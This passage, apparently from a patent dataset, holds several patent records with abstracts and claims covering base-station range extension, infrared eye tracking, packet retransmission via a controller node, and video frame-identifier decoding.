determining a second amount by which to modify a second range of a second service region of a second sector from the plurality of sectors; introducing a third delay in a second receiver buffer coupled between a second modulator-demodulator of the second sector and a second transceiver of the second sector, the third delay corresponding to the second amount; and introducing a fourth delay in a second transmitter buffer coupled between the second modulator-demodulator and the second transceiver, the fourth delay corresponding to the second amount. | Dynamic range extension of a base station. In one instance, the base station includes a base station modem having a modulator-demodulator, a clock buffer providing an advanced time signal to the modulator-demodulator, a receiver buffer coupled between the modulator-demodulator and a transceiver, a transmitter buffer coupled between the modulator-demodulator and the transceiver, and an electronic processor. The electronic processor is configured to determine a first amount by which to modify a range of a service region of the base station. The electronic processor is also configured to introduce a first delay in the receiver buffer corresponding to the first amount and introduce a second delay in the transmitter buffer corresponding to the first amount.1. A base station modem for dynamic range extension of a base station, the base station modem comprising:
a modulator-demodulator configured to be coupled to a transceiver of the base station; a clock buffer configured to receive a universal time source time and to provide a clock signal to the modulator-demodulator, wherein the clock signal is an advanced time of the universal time source time; a receiver buffer coupled between the modulator-demodulator and the transceiver configured to receive data signals from the transceiver and provide the data signals to the modulator-demodulator; a transmitter buffer coupled between the modulator-demodulator and the transceiver configured to receive data signals from the modulator-demodulator and provide the data signals to the transceiver; and an electronic processor coupled to the modulator-demodulator, the clock buffer, the receiver buffer, and the transmitter buffer and configured to:
determine a first amount by which to modify a range of a service region of the base station;
introduce a first delay in the receiver buffer corresponding to the first amount; and
introduce a second delay in the transmitter buffer corresponding to the first amount. 2. The base station modem of claim 1, wherein the electronic processor is further configured to:
introduce a maximum advance between the clock signal and the universal time source time such that the range of the service region is at a maximum extension range. 3. The base station modem of claim 2, wherein the first delay and the second delay are selected to decrease the range from the maximum extension range and to correspond to the first amount. 4. The base station modem of claim 1, wherein the electronic processor is further configured to:
determine a change in location of a mobile communication device in communication with the base station, wherein the first amount is determined such that the mobile communication device is within the service region of the base station. 5. The base station modem of claim 1, wherein the electronic processor is further configured to:
adjust one of a read pointer and a write pointer of the receiver buffer corresponding to the first delay to introduce the first delay in the receiver buffer. 6. The base station modem of claim 1, wherein the electronic processor is further configured to:
adjust one of a read pointer and a write pointer of the transmitter buffer corresponding to the second delay to introduce the second delay in the transmitter buffer. 7. The base station modem of claim 1, wherein the base station further comprises a plurality of sectors and wherein the first delay and the second delay are introduced to modify the range of the service region of a first sector of the plurality of sectors, a second sector from the plurality of sectors comprising:
a second modulator-demodulator configured to be coupled to a second transceiver of the base station; a second receiver buffer coupled between the second modulator-demodulator and the second transceiver configured to receive data signals from the second transceiver and provide the data signals to the second modulator-demodulator; a second transmitter buffer coupled between the second modulator-demodulator and the second transceiver configured to receive data signals from the second modulator-demodulator and provide the data signals to the second transceiver; and the electronic processor coupled to the second modulator-demodulator, the clock buffer, the second receiver buffer, and the second transmitter buffer and further configured to:
determine a second amount by which to modify a second range of a second service region of the second sector;
introduce a third delay in the second receiver buffer corresponding to the second amount; and
introduce a fourth delay in the second transmitter buffer corresponding to the second amount. 8. A method for dynamic range extension of a base station, the method comprising:
determining, with an electronic processor of a base station modem of the base station, a first amount by which to modify a range of a service region of the base station; introducing, with the electronic processor, a first delay in a receiver buffer coupled between a modulator-demodulator of the base station modem and a transceiver of the base station, the first delay corresponding to the first amount; and introducing, with the electronic processor, a second delay in a transmitter buffer coupled between the modulator-demodulator and the transceiver, the second delay corresponding to the first amount. 9. The method of claim 8, further comprising:
receiving, with a clock buffer coupled to the electronic processor and the modulator-demodulator, a universal time source time; and providing, with the clock buffer, a clock signal to the modulator-demodulator, wherein the clock signal is an advanced time of the universal time source time. 10. The method of claim 9, further comprising:
introducing a maximum advance between the clock signal and the universal time source time such that the range of the service region is at a maximum extension range. 11. The method of claim 10, wherein the first delay and the second delay are selected to decrease the range from the maximum extension range and to correspond to the first amount. 12. The method of claim 8, further comprising:
determining a change in location of a mobile communication device in communication with the base station, wherein the first amount is determined such that the mobile communication device is within the service region of the base station. 13. The method of claim 8, wherein introducing the first delay in the receiver buffer further comprises:
adjusting one of a read pointer and a write pointer of the receiver buffer corresponding to the first delay. 14. The method of claim 8, wherein introducing the second delay in the transmitter buffer further comprises:
adjusting one of a read pointer and a write pointer of the transmitter buffer corresponding to the second delay. 15. The method of claim 8, wherein the base station includes a plurality of sectors and wherein the first delay and the second delay are introduced to modify the range of the service region of a first sector of the plurality of sectors, the method comprising:
determining a second amount by which to modify a second range of a second service region of a second sector from the plurality of sectors; introducing a third delay in a second receiver buffer coupled between a second modulator-demodulator of the second sector and a second transceiver of the second sector, the third delay corresponding to the second amount; and introducing a fourth delay in a second transmitter buffer coupled between the second modulator-demodulator and the second transceiver, the fourth delay corresponding to the second amount. | 2,400 |
9,156 | 9,156 | 14,708,573 | 2,483 | An eye tracking apparatus is operable in both first and second illumination environments where the second illumination is associated with a higher illumination environment than the first illumination. The apparatus includes an image capturer configured to capture an image of a user, an image processor configured to detect an eyepoint of the user in the captured image, and an optical source configured to emit infrared light to the user in a first illumination mode. The image capturer includes a dual bandpass filter configured to allow infrared light and visible light to pass. | 1. An eye tracking apparatus, comprising:
an image capturer configured to capture an image of a user; an image processor configured to detect an eyepoint of the user in the captured image; and a controller configured to determine an operating mode based on an ambient illumination and control an operation of at least one of the image capturer and the image processor based on the determined operating mode, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode. 2. The apparatus of claim 1, wherein the controller is configured to determine the operating mode by comparing the ambient illumination to a threshold value. 3. The apparatus of claim 1, further comprising:
an optical source configured to emit infrared light to the user in the first illumination mode. 4. The apparatus of claim 3, wherein the optical source is configured to emit near-infrared light within a center of 850 nanometers (nm) and a bandwidth of 100 nm to the user in the first illumination mode. 5. The apparatus of claim 1, wherein the image capturer comprises:
a dual bandpass filter configured to allow visible light and infrared light to pass. 6. The apparatus of claim 5, wherein the dual bandpass filter is configured to allow visible light within a wavelength of 350 nm to 650 nm and near-infrared light within a wavelength of 800 nm to 900 nm to pass. 7. The apparatus of claim 1, wherein the image processor is configured to detect the eyepoint of the user in the captured image using a feature point from a first database, the first database including visible images in the second illumination mode, and
the image processor is configured to detect the eyepoint of the user in the captured image using a feature point from a second database, the second database including infrared images in the first illumination mode. 8. The apparatus of claim 7, wherein the image capturer further comprises:
an image corrector configured to correct the captured image, and the image corrector is configured to perform demosaicing on the captured image in the second illumination mode. 9. An image capturing apparatus, comprising:
a controller configured to determine an operating mode based on an ambient illumination, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode; an optical source configured to emit infrared light to a target area in the first illumination mode; a dual bandpass filter configured to allow infrared light and visible light to pass; an image sensor configured to generate an image by receiving light filtered by the dual bandpass filter; and an image corrector configured to correct the generated image. 10. The apparatus of claim 9, wherein the optical source is configured to emit near-infrared light within a center of 850 nm and a bandwidth of 100 nm, and
the dual bandpass filter is configured to allow visible light within a wavelength of 350 nm to 650 nm and infrared light within a wavelength of 800 nm to 900 nm to pass. 11. The apparatus of claim 9, wherein the image corrector is configured to perform demosaicing on the generated image in the second illumination mode. 12. An eye tracking method, comprising:
determining an operating mode based on an ambient illumination, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode; capturing an image of a user based on the determined operating mode; and detecting an eyepoint of the user in the captured image. 13. The method of claim 12, further comprising:
emitting infrared light to the user in the first illumination mode. 14. The method of claim 12, wherein the capturing is based on reflected light passing through a dual bandpass filter configured to allow visible light and infrared light to pass. 15. The method of claim 12, wherein the capturing includes,
capturing a visible image of the user in the second illumination mode, and capturing an infrared image of the user in the first illumination mode. 16. The method of claim 12, wherein the detecting uses a feature point from a first database including visible images in the second illumination mode. 17. The method of claim 12, wherein the detecting uses a feature point from a second database including infrared images in the first illumination mode. 18. The method of claim 12, further comprising:
demosaicing the captured image in the second illumination mode. | An eye tracking apparatus is operable in both first and second illumination environments where the second illumination is associated with a higher illumination environment than the first illumination. The apparatus includes an image capturer configured to capture an image of a user, an image processor configured to detect an eyepoint of the user in the captured image, and an optical source configured to emit infrared light to the user in a first illumination mode. The image capturer includes a dual bandpass filter configured to allow infrared light and visible light to pass.1. An eye tracking apparatus, comprising:
an image capturer configured to capture an image of a user; an image processor configured to detect an eyepoint of the user in the captured image; and a controller configured to determine an operating mode based on an ambient illumination and control an operation of at least one of the image capturer and the image processor based on the determined operating mode, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode. 2. The apparatus of claim 1, wherein the controller is configured to determine the operating mode by comparing the ambient illumination to a threshold value. 3. The apparatus of claim 1, further comprising:
an optical source configured to emit infrared light to the user in the first illumination mode. 4. The apparatus of claim 3, wherein the optical source is configured to emit near-infrared light within a center of 850 nanometers (nm) and a bandwidth of 100 nm to the user in the first illumination mode. 5. The apparatus of claim 1, wherein the image capturer comprises:
a dual bandpass filter configured to allow visible light and infrared light to pass. 6. The apparatus of claim 5, wherein the dual bandpass filter is configured to allow visible light within a wavelength of 350 nm to 650 nm and near-infrared light within a wavelength of 800 nm to 900 nm to pass. 7. The apparatus of claim 1, wherein the image processor is configured to detect the eyepoint of the user in the captured image using a feature point from a first database, the first database including visible images in the second illumination mode, and
the image processor is configured to detect the eyepoint of the user in the captured image using a feature point from a second database, the second database including infrared images in the first illumination mode. 8. The apparatus of claim 7, wherein the image capturer further comprises:
an image corrector configured to correct the captured image, and the image corrector is configured to perform demosaicing on the captured image in the second illumination mode. 9. An image capturing apparatus, comprising:
a controller configured to determine an operating mode based on an ambient illumination, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode; an optical source configured to emit infrared light to a target area in the first illumination mode; a dual bandpass filter configured to allow infrared light and visible light to pass; an image sensor configured to generate an image by receiving light filtered by the dual bandpass filter; and an image corrector configured to correct the generated image. 10. The apparatus of claim 9, wherein the optical source is configured to emit near-infrared light within a center of 850 nm and a bandwidth of 100 nm, and
the dual bandpass filter is configured to allow visible light within a wavelength of 350 nm to 650 nm and infrared light within a wavelength of 800 nm to 900 nm to pass. 11. The apparatus of claim 9, wherein the image corrector is configured to perform demosaicing on the generated image in the second illumination mode. 12. An eye tracking method, comprising:
determining an operating mode based on an ambient illumination, the determined operating mode being one of a first illumination mode and a second illumination mode, the second illumination mode associated with a higher illumination environment than the first illumination mode; capturing an image of a user based on the determined operating mode; and detecting an eyepoint of the user in the captured image. 13. The method of claim 12, further comprising:
emitting infrared light to the user in the first illumination mode. 14. The method of claim 12, wherein the capturing is based on reflected light passing through a dual bandpass filter configured to allow visible light and infrared light to pass. 15. The method of claim 12, wherein the capturing includes,
capturing a visible image of the user in the second illumination mode, and capturing an infrared image of the user in the first illumination mode. 16. The method of claim 12, wherein the detecting uses a feature point from a first database including visible images in the second illumination mode. 17. The method of claim 12, wherein the detecting uses a feature point from a second database including infrared images in the first illumination mode. 18. The method of claim 12, further comprising:
demosaicing the captured image in the second illumination mode. | 2,400 |
9,157 | 9,157 | 16,047,496 | 2,463 | Systems and computer program products for performing retransmission of data packets over a network. A node receives a data packet with a source and a destination address. The data packet is sent along a network path to the destination address, and information associated with the data packet is sent to a controller node that is independent of the network path. A controller receives information associated with a data packet from any forwarder node within a plurality of forwarder nodes each monitoring communications along separate communications paths. An indication of a receipt acknowledgement for the data packet is received from a second forwarder node that is separate from the first forwarder node and the controller node. The receipt acknowledgement is correlated with the data packet and based on the correlating, data associated with retransmission processing of the data packet is deleted. | 1. A network forwarder node, comprising:
a receiver that, when operating:
receives a data packet with a source address and a destination address, the network forwarder node being separate from a source node with the source address and separate from a destination node with the destination address; and
identifies a data packet type of the data packet;
a packet transmitter that, when operating sends the data packet along a network path to the destination node; and a controller communications interface that, when operating sends to a controller node that is separate from the network forwarder node, based on a determination that the data packet type is within a set of determined data packet types and based on sending the data packet, information identifying the data packet. 2. The network forwarder node of claim 1, wherein the controller communications interface, when operating, further defines, based on the data packet type, the information associated with the data packet to comprise data packet addressing and data packet payload data contained within the data packet. 3. The network forwarder node of claim 1, wherein the information associated with the data packet comprises at least a portion of the data packet. 4. The network forwarder node of claim 1, wherein the controller communications interface, when operating, further selects components of the data packet to be contents of a subset of data contained within the data packet, wherein the information associated with the data packet comprises only the subset. 5. The network forwarder node of claim 4, wherein the subset comprises only information to identify the data packet for correlation of a receipt acknowledgement with the data packet. 6. The network forwarder node of claim 1, further comprising a cache controller that, when operating:
stores at least a portion of the data packet into a data storage; deletes, based on receiving an indication from the controller node to delete the data packet, the at least the portion of the data packet from the data storage; and resends, based on a retransmission instruction from the controller node, the at least the portion of the data packet to the destination node. 7. The network forwarder node of claim 6, wherein the cache controller, when operating, further receives a message from the controller node comprising at least one of the indication to delete the data packet and the retransmission instruction. 8. The network forwarder node of claim 1, wherein the receiver, when operating, identifies the data packet type by at least determining a characteristic of the data packet, the characteristic comprising at least one of a subnet of an address within the data packet, a TCP port number of the data packet, and a flow direction of the data packet and wherein the data packet type is based on the characteristic. 9. A controller node, comprising:
a processor; a memory, communicatively coupled to the processor; a receiver, communicatively coupled to the processor and memory, that when operating:
receives information identifying a data packet from a first forwarder node, the first forwarder node being any forwarder node within a plurality of forwarder nodes each monitoring communications along separate communications paths, the first forwarder node forwarding the data packet to a destination node via a first communications path, each forwarder node further communicating with the controller node;
receives, from a second forwarder node subsequent to receiving the information, an indication of a receipt acknowledgement for the data packet that is received by the second forwarder node, and the second forwarder node communicating with the destination node via a different communication path than the first communications path; and
a message cache controller, communicatively coupled to the processor, the memory, and the receiver, that when operating:
correlates the indication of the receipt acknowledgement with the data packet; and
based on correlating the indication of the receipt acknowledgment with the data packet, deletes data associated with retransmission processing of the data packet. 10. The controller node of claim 9, wherein the first forwarder node and the second forwarder node are separate from one another,
wherein the first forwarder node monitors a first communications path, and wherein the second forwarder node monitors a second communications path, the first communications path and the second communications path each comprising independent, alternative communications paths of a communications channel communicatively coupling a source node and the destination node. 11. The controller node of claim 9, wherein the second forwarder node is separate from the first forwarder node and the controller node. 12. The controller node of claim 9, the message cache controller, when operating, further:
determines, after an acknowledgement timeout time interval, a lack of an indication of a receipt acknowledgment for the data packet; and based on determining the lack of the indication, causes transmission of a retransmission packet corresponding to the data packet. 13. The controller node of claim 12,
wherein the information associated with the data packet comprises identification information for the data packet, and wherein the messaging cache controller causes retransmission of the retransmission packet by at least instructing the first forwarder node to send the retransmission packet. 14. The controller node of claim 12,
wherein the information associated with the data packet comprises data packet addressing data and data packet payload data contained within the data packet, and wherein the message cache controller, when operating, further:
stores the information associated with the data packet; and
creates, based on determining the acknowledgement timeout time interval, the retransmission packet, and
wherein the messaging cache controller causes retransmission of the retransmission packet by at least transmitting the retransmission packet to a destination node specified for the data packet. 15. A computer program product for operating a network node, the computer program product comprising:
a storage medium readable by a processing circuit and storing instructions for execution by the processing circuit for performing a method comprising: receiving, at a network node, a data packet with a source address and a destination address, the network node being separate from a source node with the source address and separate from a destination node with the destination address; sending the data packet along a network path to the destination node; identifying a data packet type of the data packet; and sending to a controller node that is separate from the network node, based on a determination that the data packet type is within a set of determined data packet types and based on sending the data packet, information identifying the data packet. 16. The computer program product of claim 15, wherein identifying the data packet type comprising determining a characteristic of the data packet, the characteristic comprising at least one of a subnet of an address within the data packet, a TCP port number of the data packet, and a flow direction of the data packet and wherein the data packet type is based on the characteristic. 17. The computer program product of claim 15, the method further comprising defining, based on the data packet type, the information identifying associated with the data packet to comprise data packet addressing and data packet payload data contained within the data packet. 18. The computer program product of claim 15, the method further comprising selecting components of the data packet to be contents of a subset of data contained within the data packet, wherein the information associated with the data packet comprises only the subset. 19. The computer program product of claim 15, the method further comprising:
storing at least a portion of the data packet into a data storage; deleting, based on receiving an indication from the controller node to delete the data packet, the at least the portion of the data packet from the data storage; and
resending, based on a retransmission instruction from the controller, the at least the portion of the data packet to the destination node. 20. The computer program product of claim 16, the method further comprising receiving a message from the controller node comprising at least one of the indication to delete the data packet and the retransmission instruction. | Systems and computer program products for performing retransmission of data packets over a network. A node receives a data packet with a source and a destination address. The data packet is sent along a network path to the destination address, and information associated with the data packet is sent to a controller node that is independent of the network path. A controller receives information associated with a data packet from any forwarder node within a plurality of forwarder nodes each monitoring communications along separate communications paths. An indication of a receipt acknowledgement for the data packet is received from a second forwarder node that is separate from the first forwarder node and the controller node. The receipt acknowledgement is correlated with the data packet and based on the correlating, data associated with retransmission processing of the data packet is deleted.1. A network forwarder node, comprising:
a receiver that, when operating:
receives a data packet with a source address and a destination address, the network forwarder node being separate from a source node with the source address and separate from a destination node with the destination address; and
identifies a data packet type of the data packet;
a packet transmitter that, when operating sends the data packet along a network path to the destination node; and a controller communications interface that, when operating sends to a controller node that is separate from the network forwarder node, based on a determination that the data packet type is within a set of determined data packet types and based on sending the data packet, information identifying the data packet. 2. The network forwarder node of claim 1, wherein the controller communications interface, when operating, further defines, based on the data packet type, the information associated with the data packet to comprise data packet addressing and data packet payload data contained within the data packet. 3. The network forwarder node of claim 1, wherein the information associated with the data packet comprises at least a portion of the data packet. 4. The network forwarder node of claim 1, wherein the controller communications interface, when operating, further selects components of the data packet to be contents of a subset of data contained within the data packet, wherein the information associated with the data packet comprises only the subset. 5. The network forwarder node of claim 4, wherein the subset comprises only information to identify the data packet for correlation of a receipt acknowledgement with the data packet. 6. The network forwarder node of claim 1, further comprising a cache controller that, when operating:
stores at least a portion of the data packet into a data storage; deletes, based on receiving an indication from the controller node to delete the data packet, the at least the portion of the data packet from the data storage; and resends, based on a retransmission instruction from the controller node, the at least the portion of the data packet to the destination node. 7. The network forwarder node of claim 6, wherein the cache controller, when operating, further receives a message from the controller node comprising at least one of the indication to delete the data packet and the retransmission instruction. 8. The network forwarder node of claim 1, wherein the receiver, when operating, identifies the data packet type by at least determining a characteristic of the data packet, the characteristic comprising at least one of a subnet of an address within the data packet, a TCP port number of the data packet, and a flow direction of the data packet and wherein the data packet type is based on the characteristic. 9. A controller node, comprising:
a processor; a memory, communicatively coupled to the processor; a receiver, communicatively coupled to the processor and memory, that when operating:
receives information identifying a data packet from a first forwarder node, the first forwarder node being any forwarder node within a plurality of forwarder nodes each monitoring communications along separate communications paths, the first forwarder node forwarding the data packet to a destination node via a first communications path, each forwarder node further communicating with the controller node;
receives, from a second forwarder node subsequent to receiving the information, an indication of a receipt acknowledgement for the data packet that is received by the second forwarder node, and the second forwarder node communicating with the destination node via a different communication path than the first communications path; and
a message cache controller, communicatively coupled to the processor, the memory, and the receiver, that when operating:
correlates the indication of the receipt acknowledgement with the data packet; and
based on correlating the indication of the receipt acknowledgment with the data packet, deletes data associated with retransmission processing of the data packet. 10. The controller node of claim 9, wherein the first forwarder node and the second forwarder node are separate from one another,
wherein the first forwarder node monitors a first communications path, and wherein the second forwarder node monitors a second communications path, the first communications path and the second communications path each comprising independent, alternative communications paths of a communications channel communicatively coupling a source node and the destination node. 11. The controller node of claim 9, wherein the second forwarder node is separate from the first forwarder node and the controller node. 12. The controller node of claim 9, the message cache controller, when operating, further:
determines, after an acknowledgement timeout time interval, a lack of an indication of a receipt acknowledgment for the data packet; and based on determining the lack of the indication, causes transmission of a retransmission packet corresponding to the data packet. 13. The controller node of claim 12,
wherein the information associated with the data packet comprises identification information for the data packet, and wherein the messaging cache controller causes retransmission of the retransmission packet by at least instructing the first forwarder node to send the retransmission packet. 14. The controller node of claim 12,
wherein the information associated with the data packet comprises data packet addressing data and data packet payload data contained within the data packet, and wherein the message cache controller, when operating, further:
stores the information associated with the data packet; and
creates, based on determining the acknowledgement timeout time interval, the retransmission packet, and
wherein the messaging cache controller causes retransmission of the retransmission packet by at least transmitting the retransmission packet to a destination node specified for the data packet. 15. A computer program product for operating a network node, the computer program product comprising:
a storage medium readable by a processing circuit and storing instructions for execution by the processing circuit for performing a method comprising: receiving, at a network node, a data packet with a source address and a destination address, the network node being separate from a source node with the source address and separate from a destination node with the destination address; sending the data packet along a network path to the destination node; identifying a data packet type of the data packet; and sending to a controller node that is separate from the network node, based on a determination that the data packet type is within a set of determined data packet types and based on sending the data packet, information identifying the data packet. 16. The computer program product of claim 15, wherein identifying the data packet type comprising determining a characteristic of the data packet, the characteristic comprising at least one of a subnet of an address within the data packet, a TCP port number of the data packet, and a flow direction of the data packet and wherein the data packet type is based on the characteristic. 17. The computer program product of claim 15, the method further comprising defining, based on the data packet type, the information identifying associated with the data packet to comprise data packet addressing and data packet payload data contained within the data packet. 18. The computer program product of claim 15, the method further comprising selecting components of the data packet to be contents of a subset of data contained within the data packet, wherein the information associated with the data packet comprises only the subset. 19. The computer program product of claim 15, the method further comprising:
storing at least a portion of the data packet into a data storage; deleting, based on receiving an indication from the controller node to delete the data packet, the at least the portion of the data packet from the data storage; and
resending, based on a retransmission instruction from the controller, the at least the portion of the data packet to the destination node. 20. The computer program product of claim 16, the method further comprising receiving a message from the controller node comprising at least one of the indication to delete the data packet and the retransmission instruction. | 2,400 |
9,158 | 9,158 | 15,377,620 | 2,481 | Video data is received at a decoding device. An encoded first frame of the video data is received with a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier. An encoded second frame of the video data is also received with at least one reference frame description for the second frame comprising: a reference frame identifier, and an indicator of said storage location. This allows the decoding device to check that the correct reference frame for decoding the second frame is stored thereat. Corresponding encoding operations are also disclosed. | 1. A method of decoding encoded video data at a decoding device, the method comprising, at the decoding device:
receiving an encoded first frame of the video data and a current frame description of the encoded video data for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; decoding the first frame; storing the first frame and its frame identifier at the storage location indicated in the current frame description; receiving an encoded second frame of the video data and at least one reference frame description of the encoded video data for the second frame comprising: a reference frame identifier, and an indicator of said storage location; using the indicator in the reference frame description to access said storage location; comparing the frame identifier stored thereat with the reference frame identifier; and if the compared frame identifiers match, decoding the second frame using inter-frame decoding with the first frame stored thereat as a reference frame. 2. A method according to claim 1, wherein if the compared frame identifiers do not match, in response the decoding device generates at least one loss concealment frame to replace the second frame. 3. A method according to claim 1, wherein if the compared frame identifiers do not match, in response the receiving device transmits a lost reference frame notification via a feedback channel to a transmitting device from which the video data is received. 4. A method according to claim 1, further comprising:
receiving at the decoding device in the encoded video data, for at least one of the frame descriptions, a frame ID length indicator that identifies a length of the frame identifier in that frame description. 5. A method according to claim 4, wherein the decoding device uses the frame ID length indicator to extract the frame identifier from that frame description. 6. A method according to claim 4, wherein the frame identifier has a length equal to a sum of the frame length ID indicator and a predetermined constant. 7. A method according to claim 1, further comprising:
receiving at the decoding device in the encoded video data, for at least one of the frame descriptions, a frame ID present flag, wherein the comparing step is conditional on the frame ID present flag indicating the presence of the frame identifier in that frame description. 8. A method according to claim 1, wherein the frames and the frame descriptions are received in an encoded bit stream, the frame description forming header data of the encoded bit stream. 9. A method according to claim 8, wherein the frame identifiers are included in an uncompressed portion of the header data. 10. A method according to claim 8, wherein the storage location indicators in the current and reference frame descriptions conform to the VP9 Specification. 11. A method according to claim 1, wherein the encoded video data is received at the decoding device from a transmitting device via a network. 12. A method according to claim 4, wherein the frame ID length indicator is received at the decoding device in a sequence description of the encoded video data, the sequence description pertaining to multiple frame descriptions received for a sequence of encoded frames of the video data, each of those frame descriptions comprising a frame identifier having a length indicated thereby. 13. A method according to claim 12, wherein the sequence description and the multiple frame descriptions are received in a superframe comprising the sequence of encoded video frames, in which the sequence description is carried in a superframe syntax structure of the superframe and the frame descriptions are conveyed in frame header data associated with each coded frame. 14. An encoding device comprising a data interface configured to receive video data to be encoded and an encoder configured to implement steps of:
encoding a first frame of the video data generating a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; encoding at least a portion of a second frame of the video data using inter-frame encoding with the first frame as a reference frame; generating at least one reference frame description for the second frame comprising: an identifier of the first frame, and an indicator of said storage location at the receiving device for the first frame and its frame identifier; and wherein the encoder is configured to output, as encoded video data, the encoded frames, the frame descriptions and, in association with at least one of the frame descriptions: a frame ID repetition flag, which indicates a uniqueness type for the frame identifier in that frame description, and/or a frame ID length indicator that identifies a length of the frame identifier in that frame description. 15. An encoding device according to claim 14, wherein the frame ID repetition flag indicates a first or a second uniqueness type, wherein frame identifiers having the first uniqueness type and a length l are restricted to being unique within any sequence of 2l of such frame identifiers in the encoded video data, wherein the second uniqueness type is such that said restriction does not apply. 16. An encoding device according to claim 14, wherein the frame ID repetition flag and/or the frame ID length indicator form at least part of a sequence description of the encoded video data, the sequence description pertaining to multiple frame descriptions for a sequence of video frames in the encoded video data, each of those frame descriptions comprising a frame identifier having a length and/or a uniqueness type indicated thereby. 17. An encoding device according to claim 16, wherein the sequence description and the multiple frame descriptions form part of a superframe of the encoded video data, in which the sequence description is carried in a superframe syntax structure and the frame descriptions are conveyed in frame header data associated with each coded frame. 18. An encoding device according to claim 14, wherein the encoding device comprises a communications interface configured to transmit the frame descriptions, and the frame ID repetition flag and/or the frame ID length indicator to a receiving device via a network in a sequence of RTP payloads. 19. An encoding device according to claim 14, wherein the frame identifiers are transmitted as absolute values. 20. A computer program product comprising code stored on a computer readable storage medium and configured when executed at a decoding device to implement the following steps:
receiving an encoded first frame of video data and a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; decoding the first frame; storing the first frame and its frame identifier at the storage location indicated in the current frame description; receiving an encoded second frame of the video data and at least one reference frame description for the second frame comprising: a reference frame identifier, and an indicator of said storage location; using the indicator in the reference frame description to access said storage location; comparing the frame identifier stored thereat with the reference frame identifier; and if the compared frame identifiers match, decoding the second frame using inter-frame decoding with the first frame stored thereat as a reference frame. | Video data is received at a decoding device. An encoded first frame of the video data is received with a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier. An encoded second frame of the video data is also received with at least one reference frame description for the second frame comprising: a reference frame identifier, and an indicator of said storage location. This allows the decoding device to check that the correct reference frame for decoding the second frame is stored thereat. Corresponding encoding operations are also disclosed.1. A method of decoding encoded video data at a decoding device, the method comprising, at the decoding device:
receiving an encoded first frame of the video data and a current frame description of the encoded video data for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; decoding the first frame; storing the first frame and its frame identifier at the storage location indicated in the current frame description; receiving an encoded second frame of the video data and at least one reference frame description of the encoded video data for the second frame comprising: a reference frame identifier, and an indicator of said storage location; using the indicator in the reference frame description to access said storage location; comparing the frame identifier stored thereat with the reference frame identifier; and if the compared frame identifiers match, decoding the second frame using inter-frame decoding with the first frame stored thereat as a reference frame. 2. A method according to claim 1, wherein if the compared frame identifiers do not match, in response the decoding device generates at least one loss concealment frame to replace the second frame. 3. A method according to claim 1, wherein if the compared frame identifiers do not match, in response the receiving device transmits a lost reference frame notification via a feedback channel to a transmitting device from which the video data is received. 4. A method according to claim 1, further comprising:
receiving at the decoding device in the encoded video data, for at least one of the frame descriptions, a frame ID length indicator that identifies a length of the frame identifier in that frame description. 5. A method according to claim 4, wherein the decoding device uses the frame ID length indicator to extract the frame identifier from that frame description. 6. A method according to claim 4, wherein the frame identifier has a length equal to a sum of the frame length ID indicator and a predetermined constant. 7. A method according to claim 1, further comprising:
receiving at the decoding device in the encoded video data, for at least one of the frame descriptions, a frame ID present flag, wherein the comparing step is conditional on the frame ID present flag indicating the presence of the frame identifier in that frame description. 8. A method according to claim 1, wherein the frames and the frame descriptions are received in an encoded bit stream, the frame description forming header data of the encoded bit stream. 9. A method according to claim 8, wherein the frame identifiers are included in an uncompressed portion of the header data. 10. A method according to claim 8, wherein the storage location indicators in the current and reference frame descriptions conform to the VP9 Specification. 11. A method according to claim 1, wherein the encoded video data is received at the decoding device from a transmitting device via a network. 12. A method according to claim 4, wherein the frame ID length indicator is received at the decoding device in a sequence description of the encoded video data, the sequence description pertaining to multiple frame descriptions received for a sequence of encoded frames of the video data, each of those frame descriptions comprising a frame identifier having a length indicated thereby. 13. A method according to claim 12, wherein the sequence description and the multiple frame descriptions are received in a superframe comprising the sequence of encoded video frames, in which the sequence description is carried in a superframe syntax structure of the superframe and the frame descriptions are conveyed in frame header data associated with each coded frame. 14. An encoding device comprising a data interface configured to receive video data to be encoded and an encoder configured to implement steps of:
encoding a first frame of the video data generating a current frame description for the first frame comprising: an identifier of the first frame, and an indicator of a storage location at the receiving device for the first frame and its frame identifier; encoding at least a portion of a second frame of the video data using inter-frame encoding with the first frame as a reference frame; generating at least one reference frame description for the second frame comprising: an identifier of the first frame, and an indicator of said storage location at the receiving device for the first frame and its frame identifier; and wherein the encoder is configured to output, as encoded video data, the encoded frames, the frame descriptions and, in association with at least one of the frame descriptions: a frame ID repetition flag, which indicates a uniqueness type for the frame identifier in that frame description, and/or a frame ID length indicator that identifies a length of the frame identifier in that frame description. 15. An encoding device according to claim 14, wherein the frame ID repetition flag indicates a first or a second uniqueness type, wherein frame identifiers having the first uniqueness type and a length l are restricted to being unique within any sequence of 2l of such frame identifiers in the encoded video data, wherein the second uniqueness type is such that said restriction does not apply. 16. An encoding device according to claim 14, wherein the frame ID repetition flag and/or the frame ID length indicator form at least part of a sequence description of the encoded video data, the sequence description pertaining to multiple frame descriptions for a sequence of video frames in the encoded video data, each of those frame descriptions comprising a frame identifier having a length and/or a uniqueness type indicated thereby. 17. An encoding device according to claim 16, wherein the sequence description and the multiple frame descriptions form part of a superframe of the encoded video data, in which the sequence description is carried in a superframe syntax structure and the frame descriptions are conveyed in frame header data associated with each coded frame. 18. An encoding device according to claim 14, wherein the encoding device comprises a communications interface configured to transmit the frame descriptions, and the frame ID repetition flag and/or the frame ID length indicator to a receiving device via a network in a sequence of RTP payloads. 19. An encoding device according to claim 14, wherein the frame identifiers are transmitted as absolute values. 20. A computer program product comprising code stored on a computer readable storage medium and configured when executed at a decoding device to implement the following steps:
